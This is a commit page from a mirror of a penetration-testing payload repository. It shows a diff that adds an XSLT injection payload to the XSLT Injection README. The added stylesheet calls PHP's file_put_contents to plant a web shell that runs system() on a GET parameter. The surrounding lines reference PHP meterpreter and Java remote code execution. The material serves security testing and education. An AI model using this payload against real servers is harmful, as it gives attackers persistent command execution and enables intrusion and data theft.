mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Merge pull request #690 from idealphase/master
Update README.md (XSLT Injection)
This commit is contained in:
commit
85871c6c14
@ -161,6 +161,16 @@ Execute a PHP meterpreter using PHP wrapper.
|
|||||||
</xsl:stylesheet>
|
</xsl:stylesheet>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Execute a remote php file using `file_put_contents`
|
||||||
|
|
||||||
|
```xml
|
||||||
|
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" version="1.0">
|
||||||
|
<xsl:template match="/">
|
||||||
|
<xsl:value-of select="php:function('file_put_contents','/var/www/webshell.php','<?php echo system($_GET["command"]); ?>')" />
|
||||||
|
</xsl:template>
|
||||||
|
</xsl:stylesheet>
|
||||||
|
```
|
||||||
|
|
||||||
### Remote Code Execution with Java
|
### Remote Code Execution with Java
|
||||||
|
|
||||||
```xml
|
```xml
|
||||||
@ -214,4 +224,4 @@ Execute a PHP meterpreter using PHP wrapper.
|
|||||||
|
|
||||||
* [From XSLT code execution to Meterpreter shells - 02 July 2012 - @agarri](https://www.agarri.fr/blog/archives/2012/07/02/from_xslt_code_execution_to_meterpreter_shells/index.html)
|
* [From XSLT code execution to Meterpreter shells - 02 July 2012 - @agarri](https://www.agarri.fr/blog/archives/2012/07/02/from_xslt_code_execution_to_meterpreter_shells/index.html)
|
||||||
* [XSLT Injection - Fortify](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection)
|
* [XSLT Injection - Fortify](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection)
|
||||||
* [XSLT Injection Basics - Saxon](https://blog.hunniccyber.com/ektron-cms-remote-code-execution-xslt-transform-injection-java/)
|
* [XSLT Injection Basics - Saxon](https://blog.hunniccyber.com/ektron-cms-remote-code-execution-xslt-transform-injection-java/)
|
||||||
|
Loading…
Reference in New Issue
Block a user